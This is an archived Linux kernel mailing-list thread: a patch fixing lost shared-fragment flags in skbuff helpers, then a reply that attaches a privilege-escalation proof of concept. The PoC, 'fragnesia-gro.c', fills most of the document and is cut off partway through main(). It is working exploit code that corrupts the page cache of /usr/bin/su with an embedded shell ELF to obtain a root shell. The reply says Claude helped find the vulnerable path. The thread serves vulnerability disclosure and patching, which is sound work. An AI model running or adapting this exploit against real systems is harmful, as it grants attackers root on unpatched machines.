Linux kernel -stable discussions
 help / color / mirror / Atom feed
* [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers
@ 2026-05-13 21:07 Hyunwoo Kim
  2026-05-14  6:18 ` Sultan Alsawaf
  2026-05-14  8:04 ` Paolo Abeni
  0 siblings, 2 replies; 6+ messages in thread
From: Hyunwoo Kim @ 2026-05-13 21:07 UTC (permalink / raw)
  To: davem, edumazet, kuba, pabeni, horms, kerneljasonxing, kuniyu,
	mhal, jiayuan.chen, steffen.klassert, vakzz, ben, herbert,
	dsahern
  Cc: netdev, stable, imv4bel

Three frag-transfer helpers (__pskb_copy_fclone(), skb_try_coalesce(),
and skb_shift()) fail to propagate the SKBFL_SHARED_FRAG bit in
skb_shinfo()->flags when moving frags from source to destination.
__pskb_copy_fclone() defers the rest of the shinfo metadata to
skb_copy_header() after copying frag descriptors, but that helper
only carries over gso_{size,segs,type} and never touches
skb_shinfo()->flags; skb_try_coalesce() and skb_shift() move frag
descriptors directly and leave flags untouched.  As a result, the
destination skb keeps a reference to the same externally-owned or
page-cache-backed pages while reporting skb_has_shared_frag() as
false.

The mismatch is harmful in any in-place writer that uses
skb_has_shared_frag() to decide whether shared pages must be detoured
through skb_cow_data().  ESP input is one such writer (esp4.c,
esp6.c), and a single nft 'dup to <local>' rule -- or any other
nf_dup_ipv4() / xt_TEE caller -- is enough to land a pskb_copy()'d
skb in esp_input() with the marker stripped, letting an unprivileged
user write into the page cache of a root-owned read-only file via
authencesn-ESN stray writes.

Set SKBFL_SHARED_FRAG on the destination whenever frag descriptors
were actually moved from the source.  skb_copy() and skb_copy_expand()
share skb_copy_header() too but linearize all paged data into freshly
allocated head storage and emerge with nr_frags == 0, so
skb_has_shared_frag() returns false on its own; they need no change.

Fixes: cef401de7be8 ("net: fix possible wrong checksum generation")
Fixes: f4c50a4034e6 ("xfrm: esp: avoid in-place decrypt on shared skb frags")
Reported-by: William Bowling <vakzz@zellic.io>
Reported-by: Hyunwoo Kim <imv4bel@gmail.com>
Cc: stable@vger.kernel.org
Signed-off-by: Hyunwoo Kim <imv4bel@gmail.com>
---
Changes in v2:
- Also propagate SHARED_FRAG in skb_shift()
- v1: https://lore.kernel.org/all/agRfuVOeMI5pbHhY@v4bel/
---
 net/core/skbuff.c | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/net/core/skbuff.c b/net/core/skbuff.c
index 7dad68e3b518..7cd388504297 100644
--- a/net/core/skbuff.c
+++ b/net/core/skbuff.c
@@ -2248,6 +2248,7 @@ struct sk_buff *__pskb_copy_fclone(struct sk_buff *skb, int headroom,
 			skb_frag_ref(skb, i);
 		}
 		skb_shinfo(n)->nr_frags = i;
+		skb_shinfo(n)->flags |= skb_shinfo(skb)->flags & SKBFL_SHARED_FRAG;
 	}
 
 	if (skb_has_frag_list(skb)) {
@@ -4349,6 +4350,8 @@ int skb_shift(struct sk_buff *tgt, struct sk_buff *skb, int shiftlen)
 	tgt->ip_summed = CHECKSUM_PARTIAL;
 	skb->ip_summed = CHECKSUM_PARTIAL;
 
+	skb_shinfo(tgt)->flags |= skb_shinfo(skb)->flags & SKBFL_SHARED_FRAG;
+
 	skb_len_add(skb, -shiftlen);
 	skb_len_add(tgt, shiftlen);
 
@@ -6200,6 +6203,8 @@ bool skb_try_coalesce(struct sk_buff *to, struct sk_buff *from,
 	       from_shinfo->frags,
 	       from_shinfo->nr_frags * sizeof(skb_frag_t));
 	to_shinfo->nr_frags += from_shinfo->nr_frags;
+	if (from_shinfo->nr_frags)
+		to_shinfo->flags |= from_shinfo->flags & SKBFL_SHARED_FRAG;
 
 	if (!skb_cloned(from))
 		from_shinfo->nr_frags = 0;
-- 
2.43.0


^ permalink raw reply related	[flat|nested] 6+ messages in thread

* Re: [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers
  2026-05-13 21:07 [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers Hyunwoo Kim
@ 2026-05-14  6:18 ` Sultan Alsawaf
  2026-05-14  9:23   ` Hyunwoo Kim
  2026-05-14  8:04 ` Paolo Abeni
  1 sibling, 1 reply; 6+ messages in thread
From: Sultan Alsawaf @ 2026-05-14  6:18 UTC (permalink / raw)
  To: Hyunwoo Kim
  Cc: davem, edumazet, kuba, pabeni, horms, kerneljasonxing, kuniyu,
	mhal, jiayuan.chen, steffen.klassert, vakzz, ben, herbert,
	dsahern, netdev, stable

[-- Attachment #1: Type: text/plain, Size: 852 bytes --]

On Thu, May 14, 2026 at 06:07:44AM +0900, Hyunwoo Kim wrote:
> Changes in v2:
> - Also propagate SHARED_FRAG in skb_shift()
> - v1: https://lore.kernel.org/all/agRfuVOeMI5pbHhY@v4bel/

Hi Hyunwoo,

I've been working on mitigating this vulnerability as a member of the kernel
team at CIQ, a distro vendor. In particular, we wanted to make sure that there
weren't any lingering places missing SHARED_FRAG propagation.

To that end, I used Claude to discover that skb_gro_receive() remained unpatched
(as you pointed out in the v1 thread). And then I generated a PoC exploiting the
vulnerable skb_gro_receive() path.

The PoC is a modified version of the original fragnesia PoC. It works 100% of
the time, just like the original fragnesia PoC.

I have attached the PoC and a patch that fixes skb_gro_receive(). Please take a
look at them.

Thanks,
Sultan

[-- Attachment #2: fragnesia-gro.c --]
[-- Type: text/plain, Size: 25061 bytes --]

/*
 * fragnesia-gro.c: skb_gro_receive() SKBFL_SHARED_FRAG page-cache corruption PoC
 *
 * Drop-in replacement for the espintcp fragnesia variant, targeting the same
 * bug class (CVE-2026-46300) through the GRO frag-merge path instead of the
 * espintcp path. Copies shell_elf over /usr/bin/su's page cache the same way
 * the original fragnesia does.
 *
 * The exploit splices 17 bytes per round (1 byte ciphertext + 16 byte ICV) so
 * each ESP decrypt corrupts exactly ONE target byte with no collateral damage.
 * A precomputed IV table selects the AES-GCM keystream byte that XORs the
 * current file content to the desired shell_elf byte.
 *
 * Based on the Fragnesia PoC by William Bowling / Hyunwoo Kim.
 *
 * Build:
 *   gcc -O2 -Wall -Wextra -static fragnesia-gro.c -o fragnesia-gro
 *
 * Run (as root):
 *   ./fragnesia-gro
 *
 * Exit codes:
 *   1: vulnerable (page cache mutated through GRO flag-strip path)
 *   0: fixed (byte unchanged)
 *   2: local setup or argument error
 *   4: namespace/veth gate closed
 */

#define _GNU_SOURCE

#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sched.h>
#include <signal.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mount.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <time.h>
#include <sys/wait.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <linux/if_addr.h>
#include <linux/if_alg.h>
#include <linux/netlink.h>
#include <linux/xfrm.h>

/* ---- compat defines ---- */

#ifndef NLA_ALIGNTO
#define NLA_ALIGNTO 4
#endif
#define NLA_ALIGN(len)  (((len) + NLA_ALIGNTO - 1) & ~(NLA_ALIGNTO - 1))
#ifndef NLA_HDRLEN
#define NLA_HDRLEN      ((int)NLA_ALIGN(sizeof(struct nlattr)))
#endif
#ifndef RTM_NEWLINK
#define RTM_NEWLINK 16
#endif
#ifndef RTM_NEWADDR
#define RTM_NEWADDR 20
#endif
#ifndef NETLINK_ROUTE
#define NETLINK_ROUTE 0
#endif
#ifndef NETLINK_XFRM
#define NETLINK_XFRM 6
#endif
#ifndef IFLA_IFNAME
#define IFLA_IFNAME 3
#endif
#ifndef IFLA_LINKINFO
#define IFLA_LINKINFO 18
#endif
#ifndef IFLA_INFO_KIND
#define IFLA_INFO_KIND 1
#endif
#ifndef IFLA_INFO_DATA
#define IFLA_INFO_DATA 2
#endif
#ifndef VETH_INFO_PEER
#define VETH_INFO_PEER 1
#endif
#ifndef IFLA_NET_NS_PID
#define IFLA_NET_NS_PID 19
#endif
#ifndef IFA_LOCAL
#define IFA_LOCAL 2
#endif
#ifndef IFA_ADDRESS
#define IFA_ADDRESS 1
#endif
#ifndef NLA_F_NESTED
#define NLA_F_NESTED (1 << 15)
#endif
#ifndef ETHTOOL_SGRO
#define ETHTOOL_SGRO 0x0000002c
#endif
#ifndef ETHTOOL_STSO
#define ETHTOOL_STSO 0x0000001f
#endif
#ifndef ETHTOOL_SGSO
#define ETHTOOL_SGSO 0x00000024
#endif
#ifndef SIOCETHTOOL
#define SIOCETHTOOL 0x8946
#endif
#ifndef UDP_ENCAP
#define UDP_ENCAP 100
#endif
#ifndef UDP_ENCAP_ESPINUDP
#define UDP_ENCAP_ESPINUDP 2
#endif
#ifndef UDP_GRO
#define UDP_GRO 104
#endif
#ifndef UDP_CORK
#define UDP_CORK 1
#endif
#ifndef AF_ALG
#define AF_ALG 38
#endif
#ifndef SOL_ALG
#define SOL_ALG 279
#endif
#ifndef ALG_SET_KEY
#define ALG_SET_KEY 1
#endif
#ifndef ALG_SET_OP
#define ALG_SET_OP 3
#endif
#ifndef ALG_OP_ENCRYPT
#define ALG_OP_ENCRYPT 1
#endif
#ifndef IFLA_XDP
#define IFLA_XDP 43
#endif
#ifndef IFLA_XDP_FD
#define IFLA_XDP_FD 1
#endif
#ifndef IFLA_XDP_FLAGS
#define IFLA_XDP_FLAGS 3
#endif
#ifndef XDP_FLAGS_SKB_MODE
#define XDP_FLAGS_SKB_MODE (1U << 1)
#endif

struct rtnl_ifinfomsg {
	unsigned char  ifi_family;
	unsigned char  __ifi_pad;
	unsigned short ifi_type;
	int            ifi_index;
	unsigned int   ifi_flags;
	unsigned int   ifi_change;
};

/* ---- constants ---- */

#define VETH0       "veth0"
#define VETH1       "veth1"
#define ADDR_SRC    "10.0.0.1"
#define ADDR_DST    "10.0.0.2"
#define UDP_PORT    4500
#define ESP_SPI     0x100
#define ICV_LEN     16
#define PAYLOAD_LEN 192
/*
 * Splice exactly 17 bytes per round: rfc4106 shifts the 8-byte IV into
 * the AAD, so the inner GCM sees SPLICE_LEN bytes of ciphertext. With
 * SPLICE_LEN - ICV_LEN = 1, exactly one frag byte is decrypted.
 */
#define SPLICE_LEN  (1 + ICV_LEN)

static const unsigned char xfrm_key[20] = {
	0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77,
	0x88, 0x99, 0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff,
	0x01, 0x02, 0x03, 0x04
};

static const uint8_t shell_elf[PAYLOAD_LEN] = {
	0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x78,0x00,0x40,0x00,0x00,0x00,0x00,0x00,
	0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,
	0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0x31,0xf6,0x31,0xc0,0xb0,0x6a,
	0x0f,0x05,0xb0,0x69,0x0f,0x05,0xb0,0x74,0x0f,0x05,0x6a,0x00,0x48,0x8d,0x05,0x12,
	0x00,0x00,0x00,0x50,0x48,0x89,0xe2,0x48,0x8d,0x3d,0x12,0x00,0x00,0x00,0x31,0xf6,
	0x6a,0x3b,0x58,0x0f,0x05,0x54,0x45,0x52,0x4d,0x3d,0x78,0x74,0x65,0x72,0x6d,0x00,
	0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
};

static const char *target_file = "/usr/bin/su";

/* ---- utility ---- */

static void die(const char *w) { fprintf(stderr, "%s: %s\n", w, strerror(errno)); exit(2); }
static void gate_fail(const char *w) { fprintf(stderr, "gate_closed: %s: %s\n", w, strerror(errno)); exit(4); }

static void store_be32(unsigned char *p, uint32_t v)
{
	p[0] = v >> 24; p[1] = v >> 16; p[2] = v >> 8; p[3] = v;
}

static void sync_write(int fd) { unsigned char b = 1; if (write(fd, &b, 1) != 1) die("sync_write"); }
static void sync_read(int fd)  { unsigned char b; if (read(fd, &b, 1) != 1) die("sync_read"); }

static unsigned char read_byte_at(int fd, off_t off)
{
	unsigned char b;
	if (pread(fd, &b, 1, off) != 1) die("pread");
	return b;
}

/* ---- netlink helpers ---- */

static int nl_ack_errno(char *buf, ssize_t len)
{
	struct nlmsghdr *nlh;
	for (nlh = (struct nlmsghdr *)buf; NLMSG_OK(nlh, (unsigned int)len);
	     nlh = NLMSG_NEXT(nlh, len)) {
		if (nlh->nlmsg_type == NLMSG_ERROR) {
			struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(nlh);
			if (e->error == 0) return 0;
			errno = -e->error;
			return -1;
		}
	}
	errno = EPROTO;
	return -1;
}

static void add_nlattr(struct nlmsghdr *nlh, size_t max,
		       unsigned short type, const void *data, size_t len)
{
	size_t off = NLMSG_ALIGN(nlh->nlmsg_len);
	struct nlattr *nla = (struct nlattr *)((char *)nlh + off);
	if (off + NLA_HDRLEN + len > max) { fprintf(stderr, "nlmsg overflow\n"); exit(2); }
	nla->nla_type = type;
	nla->nla_len = NLA_HDRLEN + len;
	memcpy((char *)nla + NLA_HDRLEN, data, len);
	nlh->nlmsg_len = off + NLA_ALIGN(nla->nla_len);
}

static struct nlattr *nest_begin(struct nlmsghdr *nlh, size_t max, unsigned short type)
{
	size_t off = NLMSG_ALIGN(nlh->nlmsg_len);
	struct nlattr *nla = (struct nlattr *)((char *)nlh + off);
	if (off + NLA_HDRLEN > max) { fprintf(stderr, "nlmsg overflow\n"); exit(2); }
	nla->nla_type = type;
	nla->nla_len = NLA_HDRLEN;
	nlh->nlmsg_len = off + NLA_HDRLEN;
	return nla;
}

static void nest_end(struct nlmsghdr *nlh, struct nlattr *nla)
{
	nla->nla_len = (unsigned short)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len) - (char *)nla);
}

static void nl_talk(struct nlmsghdr *nlh, int proto, const char *label)
{
	struct sockaddr_nl sa = { .nl_family = AF_NETLINK };
	char resp[4096];
	int fd = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, proto);
	if (fd < 0) gate_fail(label);
	if (bind(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) gate_fail(label);
	memset(&sa, 0, sizeof(sa));
	sa.nl_family = AF_NETLINK;
	if (sendto(fd, nlh, nlh->nlmsg_len, 0, (struct sockaddr *)&sa, sizeof(sa)) < 0) gate_fail(label);
	ssize_t r = recv(fd, resp, sizeof(resp), 0);
	if (r < 0 || nl_ack_errno(resp, r) < 0) gate_fail(label);
	close(fd);
}

/* ---- network setup ---- */

static void if_up(const char *name)
{
	struct ifreq ifr = {};
	int fd = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0);
	if (fd < 0) gate_fail("socket");
	strncpy(ifr.ifr_name, name, IFNAMSIZ - 1);
	if (ioctl(fd, SIOCGIFFLAGS, &ifr) < 0) gate_fail(name);
	ifr.ifr_flags |= IFF_UP;
	if (ioctl(fd, SIOCSIFFLAGS, &ifr) < 0) gate_fail(name);
	close(fd);
}

static void create_veth(void)
{
	char buf[4096] = {};
	struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
	nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct rtnl_ifinfomsg));
	nlh->nlmsg_type = RTM_NEWLINK;
	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL;
	((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_family = AF_UNSPEC;
	add_nlattr(nlh, sizeof(buf), IFLA_IFNAME, VETH0, strlen(VETH0) + 1);
	struct nlattr *li = nest_begin(nlh, sizeof(buf), IFLA_LINKINFO | NLA_F_NESTED);
	add_nlattr(nlh, sizeof(buf), IFLA_INFO_KIND, "veth", 5);
	struct nlattr *id = nest_begin(nlh, sizeof(buf), IFLA_INFO_DATA | NLA_F_NESTED);
	struct nlattr *pn = nest_begin(nlh, sizeof(buf), VETH_INFO_PEER | NLA_F_NESTED);
	{ size_t o = NLMSG_ALIGN(nlh->nlmsg_len);
	  memset((char *)nlh + o, 0, sizeof(struct rtnl_ifinfomsg));
	  nlh->nlmsg_len = o + sizeof(struct rtnl_ifinfomsg); }
	add_nlattr(nlh, sizeof(buf), IFLA_IFNAME, VETH1, strlen(VETH1) + 1);
	nest_end(nlh, pn); nest_end(nlh, id); nest_end(nlh, li);
	nl_talk(nlh, NETLINK_ROUTE, "create veth");
}

static void move_to_netns(const char *name, pid_t pid)
{
	char buf[4096] = {};
	struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
	uint32_t ns_pid = (uint32_t)pid;
	unsigned int idx = if_nametoindex(name);
	if (!idx) gate_fail("if_nametoindex");
	nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct rtnl_ifinfomsg));
	nlh->nlmsg_type = RTM_NEWLINK;
	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
	((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_family = AF_UNSPEC;
	((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_index = (int)idx;
	add_nlattr(nlh, sizeof(buf), IFLA_NET_NS_PID, &ns_pid, sizeof(ns_pid));
	nl_talk(nlh, NETLINK_ROUTE, "move veth");
}

static void add_addr(const char *name, const char *addr)
{
	char buf[4096] = {};
	struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
	struct in_addr a;
	unsigned int idx = if_nametoindex(name);
	if (!idx) gate_fail("if_nametoindex");
	inet_pton(AF_INET, addr, &a);
	nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct ifaddrmsg));
	nlh->nlmsg_type = RTM_NEWADDR;
	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL;
	struct ifaddrmsg *ifa = (struct ifaddrmsg *)NLMSG_DATA(nlh);
	ifa->ifa_family = AF_INET;
	ifa->ifa_prefixlen = 24;
	ifa->ifa_index = idx;
	add_nlattr(nlh, sizeof(buf), IFA_LOCAL, &a, sizeof(a));
	add_nlattr(nlh, sizeof(buf), IFA_ADDRESS, &a, sizeof(a));
	nl_talk(nlh, NETLINK_ROUTE, "add addr");
}

static void ethtool_set(const char *name, uint32_t cmd, uint32_t data)
{
	struct ifreq ifr = {};
	struct { uint32_t cmd; uint32_t data; } val = { cmd, data };
	int fd = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0);
	if (fd < 0) return;
	strncpy(ifr.ifr_name, name, IFNAMSIZ - 1);
	ifr.ifr_data = (void *)&val;
	ioctl(fd, SIOCETHTOOL, &ifr);
	close(fd);
}

/* ---- XDP attach/detach for NAPI init ---- */

static void xdp_toggle(const char *name, int prog_fd, uint32_t flags)
{
	char buf[4096] = {};
	struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
	unsigned int idx = if_nametoindex(name);
	if (!idx) return;
	nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct rtnl_ifinfomsg));
	nlh->nlmsg_type = RTM_NEWLINK;
	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
	((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_family = AF_UNSPEC;
	((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_index = (int)idx;
	struct nlattr *x = nest_begin(nlh, sizeof(buf), IFLA_XDP | NLA_F_NESTED);
	add_nlattr(nlh, sizeof(buf), IFLA_XDP_FD, &prog_fd, sizeof(prog_fd));
	add_nlattr(nlh, sizeof(buf), IFLA_XDP_FLAGS, &flags, sizeof(flags));
	nest_end(nlh, x);
	nl_talk(nlh, NETLINK_ROUTE, "xdp");
}

static void enable_veth_napi(const char *name)
{
	struct bpf_insn { uint8_t code; uint8_t regs; int16_t off; int32_t imm; };
	struct bpf_insn prog[] = { { 0xb7, 0, 0, 2 }, { 0x95, 0, 0, 0 } };
	struct { uint32_t t; uint32_t c; uint64_t i; uint64_t l;
		 uint32_t a,b; uint64_t d; uint32_t e,f; char n[16]; } attr = {};
	static const char lic[] = "GPL";
	attr.t = 6; attr.c = 2;
	attr.i = (uint64_t)(unsigned long)prog;
	attr.l = (uint64_t)(unsigned long)lic;
	int fd = (int)syscall(__NR_bpf, 5, &attr, sizeof(attr));
	if (fd < 0) return;
	xdp_toggle(name, fd, XDP_FLAGS_SKB_MODE);
	close(fd);
	int m1 = -1;
	xdp_toggle(name, m1, XDP_FLAGS_SKB_MODE);
}

/* ---- user namespace ---- */

static void setup_userns(void)
{
	uid_t uid = getuid();
	gid_t gid = getgid();
	int rp[2], mp[2];
	if (pipe(rp) < 0 || pipe(mp) < 0) die("pipe");
	pid_t c = fork();
	if (c < 0) die("fork");
	if (c == 0) {
		char path[64], map[64]; pid_t pp = getppid();
		close(rp[1]); close(mp[0]); sync_read(rp[0]);
		snprintf(path, sizeof(path), "/proc/%d/setgroups", pp);
		int fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, "deny", 4); close(fd); }
		snprintf(path, sizeof(path), "/proc/%d/uid_map", pp);
		snprintf(map, sizeof(map), "0 %u 1\n", uid);
		fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, map, strlen(map)); close(fd); }
		snprintf(path, sizeof(path), "/proc/%d/gid_map", pp);
		snprintf(map, sizeof(map), "0 %u 1\n", gid);
		fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, map, strlen(map)); close(fd); }
		sync_write(mp[1]); _exit(0);
	}
	close(rp[0]); close(mp[1]);
	if (unshare(CLONE_NEWUSER) < 0) gate_fail("unshare(CLONE_NEWUSER)");
	sync_write(rp[1]); sync_read(mp[0]); waitpid(c, NULL, 0);
	setresgid(0, 0, 0); setresuid(0, 0, 0);
}

/* ---- XFRM SA ---- */

static void add_sa(void)
{
	char buf[4096] = {};
	char ab[sizeof(struct xfrm_algo_aead) + sizeof(xfrm_key)];
	struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
	nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info));
	nlh->nlmsg_type = XFRM_MSG_NEWSA;
	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
	struct xfrm_usersa_info *xs = (struct xfrm_usersa_info *)NLMSG_DATA(nlh);
	xs->sel.family = AF_INET;
	inet_pton(AF_INET, ADDR_SRC, &xs->saddr.a4);
	inet_pton(AF_INET, ADDR_DST, &xs->id.daddr.a4);
	xs->id.spi = htonl(ESP_SPI); xs->id.proto = IPPROTO_ESP;
	xs->family = AF_INET; xs->mode = XFRM_MODE_TRANSPORT; xs->replay_window = 0;
	xs->lft.soft_byte_limit = xs->lft.hard_byte_limit = XFRM_INF;
	xs->lft.soft_packet_limit = xs->lft.hard_packet_limit = XFRM_INF;
	memset(ab, 0, sizeof(ab));
	struct xfrm_algo_aead *a = (struct xfrm_algo_aead *)ab;
	strcpy(a->alg_name, "rfc4106(gcm(aes))");
	a->alg_key_len = sizeof(xfrm_key) * 8;
	a->alg_icv_len = ICV_LEN * 8;
	memcpy(a->alg_key, xfrm_key, sizeof(xfrm_key));
	add_nlattr(nlh, sizeof(buf), XFRMA_ALG_AEAD, ab, sizeof(ab));
	struct xfrm_encap_tmpl encap = {};
	encap.encap_type = UDP_ENCAP_ESPINUDP;
	encap.encap_sport = htons(UDP_PORT);
	encap.encap_dport = htons(UDP_PORT);
	add_nlattr(nlh, sizeof(buf), XFRMA_ENCAP, &encap, sizeof(encap));
	nl_talk(nlh, NETLINK_XFRM, "add SA");
}

/* ---- AES-GCM keystream ---- */

static void aes_ecb_block(int alg_fd, const unsigned char in[16], unsigned char out[16])
{
	char cb[CMSG_SPACE(sizeof(uint32_t))] = {};
	struct iovec iov = { (void *)in, 16 };
	struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1, .msg_control = cb, .msg_controllen = sizeof(cb) };
	uint32_t op = ALG_OP_ENCRYPT;
	struct cmsghdr *cm = CMSG_FIRSTHDR(&msg);
	cm->cmsg_level = SOL_ALG; cm->cmsg_type = ALG_SET_OP;
	cm->cmsg_len = CMSG_LEN(sizeof(op));
	memcpy(CMSG_DATA(cm), &op, sizeof(op));
	int ofd = accept4(alg_fd, NULL, NULL, SOCK_CLOEXEC);
	if (ofd < 0) die("AF_ALG accept");
	if (sendmsg(ofd, &msg, 0) != 16) die("AF_ALG send");
	if (read(ofd, out, 16) != 16) die("AF_ALG read");
	close(ofd);
}

/*
 * rfc4106 shifts the 8-byte ESP IV into the AAD, so the inner GCM
 * ciphertext starts at frag byte 0. The target byte is at CTR position 0.
 */
#define KS_POS 0

static uint16_t stream_nonce[256];
static bool stream_have[256];

static void build_stream_table(void)
{
	struct sockaddr_alg sa = { .salg_family = AF_ALG };
	strcpy((char *)sa.salg_type, "skcipher");
	strcpy((char *)sa.salg_name, "ecb(aes)");
	int fd = socket(AF_ALG, SOCK_SEQPACKET | SOCK_CLOEXEC, 0);
	if (fd < 0) die("AF_ALG");
	if (bind(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) die("AF_ALG bind");
	if (setsockopt(fd, SOL_ALG, ALG_SET_KEY, xfrm_key, 16) < 0) die("AF_ALG key");

	unsigned int count = 0;
	for (unsigned nonce = 0; nonce <= 0xffff && count < 256; nonce++) {
		unsigned char iv[8], cb[16], out[16];
		memset(iv, 0xcc, sizeof(iv));
		store_be32(iv + 4, nonce);
		memcpy(cb, &xfrm_key[16], 4);
		memcpy(cb + 4, iv, 8);
		store_be32(cb + 12, 2 + KS_POS / 16);
		aes_ecb_block(fd, cb, out);
		unsigned char b = out[KS_POS % 16];
		if (stream_have[b]) continue;
		stream_have[b] = true;
		stream_nonce[b] = (uint16_t)nonce;
		count++;
	}
	close(fd);
	if (count < 256) { fprintf(stderr, "incomplete stream table: %u/256\n", count); exit(2); }
}

/* ---- main ---- */

int main(void)
{
	setvbuf(stdout, NULL, _IONBF, 0);

	printf("[*] uid=%d euid=%d gid=%d egid=%d\n",
	       getuid(), geteuid(), getgid(), getegid());
	printf("[*] mode=gro_espinudp_pagecache_replace\n\n");

	struct stat st;
	if (stat(target_file, &st) < 0 || !S_ISREG(st.st_mode) || st.st_size < PAYLOAD_LEN + SPLICE_LEN)
		die("stat target");

	printf("[*] target=%s size=%lld\n", target_file, (long long)st.st_size);

	build_stream_table();
	printf("[*] stream_table=256 entries at ciphertext position %d\n", KS_POS);

	/*
	 * Fork before entering the user namespace. The child enters the
	 * user/net namespace and does all the page-cache corruption. The
	 * parent stays in the init user namespace so that execve() of the
	 * corrupted setuid su binary honors the setuid bit, giving a real
	 * root shell rather than a fake namespace-root shell.
	 */
	fflush(stdout); fflush(stderr);
	pid_t worker = fork();
	if (worker < 0) die("fork worker");
	if (worker > 0) {
		int wstatus;
		waitpid(worker, &wstatus, 0);
		if (WIFEXITED(wstatus) && WEXITSTATUS(wstatus) == 1) {
			char *argv[] = { (char *)target_file, NULL };
			char *envp[] = { NULL };
			execve(target_file, argv, envp);
		}
		return WIFEXITED(wstatus) ? WEXITSTATUS(wstatus) : 2;
	}

	/* Child: enter user namespace and do the corruption */
	if (getuid() != 0) setup_userns();
	if (unshare(CLONE_NEWNET) < 0) gate_fail("unshare(CLONE_NEWNET)");
	if_up("lo");
	create_veth();

	int p_ns[2], p_veth[2], p_rdy[2];
	if (pipe(p_ns) < 0 || pipe(p_veth) < 0 || pipe(p_rdy) < 0) die("pipe");
	fflush(stdout); fflush(stderr);

	pid_t rx = fork();
	if (rx < 0) die("fork");

	if (rx == 0) {
		close(p_ns[0]); close(p_veth[1]); close(p_rdy[0]);
		if (unshare(CLONE_NEWNET) < 0) gate_fail("unshare(CLONE_NEWNET)");
		if (unshare(CLONE_NEWNS) < 0) gate_fail("unshare(CLONE_NEWNS)");
		mount("", "/", NULL, MS_PRIVATE | MS_REC, NULL);
		mount("sysfs", "/sys", "sysfs", 0, NULL);
		sync_write(p_ns[1]); close(p_ns[1]);
		sync_read(p_veth[0]); close(p_veth[0]);
		if_up("lo");
		ethtool_set(VETH1, ETHTOOL_SGRO, 1);
		if_up(VETH1);
		enable_veth_napi(VETH1);
		add_addr(VETH1, ADDR_DST);
		add_sa();
		int ufd = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0);
		if (ufd < 0) gate_fail("socket");
		struct sockaddr_in ba = { .sin_family = AF_INET, .sin_port = htons(UDP_PORT) };
		inet_pton(AF_INET, ADDR_DST, &ba.sin_addr);
		if (bind(ufd, (struct sockaddr *)&ba, sizeof(ba)) < 0) gate_fail("bind");
		int et = UDP_ENCAP_ESPINUDP, gro = 1;
		setsockopt(ufd, IPPROTO_UDP, UDP_ENCAP, &et, sizeof(et));
		setsockopt(ufd, IPPROTO_UDP, UDP_GRO, &gro, sizeof(gro));
		sync_write(p_rdy[1]);
		pause();
		_exit(0);
	}

	close(p_ns[1]); close(p_veth[0]); close(p_rdy[1]);
	sync_read(p_ns[0]); close(p_ns[0]);
	move_to_netns(VETH1, rx);
	sync_write(p_veth[1]); close(p_veth[1]);
